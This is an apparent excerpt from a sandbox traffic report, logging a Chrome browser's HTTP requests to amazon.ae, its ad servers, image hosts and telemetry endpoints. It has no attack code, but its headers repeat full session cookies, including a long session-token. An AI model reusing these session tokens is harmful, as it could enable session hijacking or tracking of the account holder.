Source: global trafficHTTP traffic detected: GET /s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_rb_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=NMc_00QDRY2_1zWXHDYw0g&a=cm&ex-pl-n-kr-new=Naup9umsR8qjcTxFb2ilkg&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=hNTQsyYhS2GGOCcWs3wFCQ&ep=ttam_T219Ay-cPciHbT10nY7Fvbd7iRSpweloqqrJ5pKjcecjBSqbIO9gzY5fZpHW8FVTwAAZTi1FVgAtX8mi3nR_PdVDtHSGTSx896mryq-SdvK8-23WpndIQOIc6JjBzdjSE5yekL8GojgigfQVBTDAt2gU10hYafvg5LOW0CYxHZVakUCPH5iw6dDpEiI9r8Ybj8gK-isRTP44N849cuByCLDpmaA5Rdjmd4H8LICNSzRnWwGC0Z_OU9l81RspLixN_9UCB-Smol5hFXH5SaiIrLKkbD_UPc6KDfeOtBulbOKp3i82M4Rav0mxm8NSL1beSmHspDyDDgmtM_Dn4loVVSbn2tIMnwbHXgNepydfAEt0hqR_u281JN4F1MhoVNG8WC_EHZMxdfifQVJtZvIJGchDMpyUUGsf_9zUrH3SyS4PSGagUack0siuW6ab_qsSaJ2S5kaK_w-E8T8YmnxN_Sf-iv6Qern5EpqRX9siMCQk1vGX2OJfD-WLirBkSQPrhY3CcS0VTrhn_HkfG-QL41BGfX-LmyYbBl4XQtTQ8-NEgqOG4khSFxIn9EmNzs1r2R3VuwoeuxRCLHlsgNIDQXACIrC1HCpYnG70vBtpI6QSi7cctvdXgCT32M4AYQyulqHiOeOpOe9q_TqzWR4m9XwztZUud5p6rGR3U5eOIjyMV2sGdLwaxC5XNMzXoUE0j_ukHALKmgU6QBOYByDNDuoH0_N-Dh-y0Hum8e6P26ldA5XajePx8SkRAXtjX7mAFoZCpbtDj_145tMg7INIrVIfdFXcBEQjeCLtn35c69rfIgC6o8iJ24bQcCb3eP__COvgYoGTI_rKdZyqJQPhqutkWf1IXjhK53UEnTnE6coXjL3WssLOcGD4X85rt43otV6qFS9XV03bLjwYREtB9vL0PkJzsJYX9zYXa8UZjLLsqqJxetijkPHI8jCjp72RBW_JHLHN7rqCEIFSWafSSHx_L0MlFQagSL5qiNzNy-53mNqwaYfc8YmMSUpQTMvSlostBAtA5i5drpLktKnGiJx8YrUZXeHXBrAtLfldiCSrc5FjPKpx4gaUI1-5fvvqKlVjaKIYN1833TwUo6tAH8lg7ZlwbbPGo8RFYuC8zRbaUdmb_hfwKuRIXELYwJzDmdTXfb2tnzwGGpRvA HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /rd/uedata?ld&v=0.294992.0&id=C37SFEY0GDXEZ5HDEVRN&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=C37SFEY0GDXEZ5HDEVRN&ue=6&bb=1312&ns=1335&ne=1376&be=1599&cf=3071&af=8717&fn=8717&fp=17513&fcp=17513&pc=41598&tc=-1188&na_=-1188&ul_=-1723469002998&_ul=-1723469002998&rd_=-1723469002998&_rd=-1723469002998&fe_=-1184&lk_=-1138&_lk=-1138&co_=-1138&_co=-366&sc_=-1097&rq_=-365&rs_=-36&_rs=505&dl_=-28&di_=1807&de_=1807&_de=1807&_dc=41575&ld_=41575&_ld=-1723469002998&ntd=-1&ty=0&rc=0&hob=4&hoe=6&ld=41599&t=1723469044597&ctb=1&rt=cf:14-1-4-7-2-0-1_af:44-1-5-33-5-0-1_ld:240-9-7-215-7-0-1&pty=Gateway&spty=desktop&pti=desktop&tid=C37SFEY0GDXEZ5HDEVRN&aftb=1&lob=1 HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 1.35sec-ch-dpr: 1ect: 3gsec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469047006&tb:s-JZJKZTDKNV2CKC82BW2M|1723469046283
Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /x/px/RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk/atf/%7B%22atf%22:false%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xIrwwZU0L._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/I/61Lc5g66DAL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31bJewCvY-L.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryDomReady%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Ddesktop-1-active%26cf0%3D41684%26pc0%3D41684%26ld0%3D41684%26t0%3D1723469044682%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41683 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Ddesktop-7-active%26cf0%3D41685%26pc0%3D41685%26ld0%3D41685%26t0%3D1723469044683%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41684 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469047006&tb:s-JZJKZTDKNV2CKC82BW2M|1723469046283
Source: global trafficHTTP traffic detected: GET /images/I/412CLCbp2pL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41Zp3xaXvPL._SR480,440_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D41685%26pc0%3D41685%26ld0%3D41685%26t0%3D1723469044683%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41684 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryPageShow%26cf0%3D41686%26pc0%3D41686%26ld0%3D41686%26t0%3D1723469044684%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41685 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D17513%26pc%3D41698%26at%3D41698%26t%3D1723469044696%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41697 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; 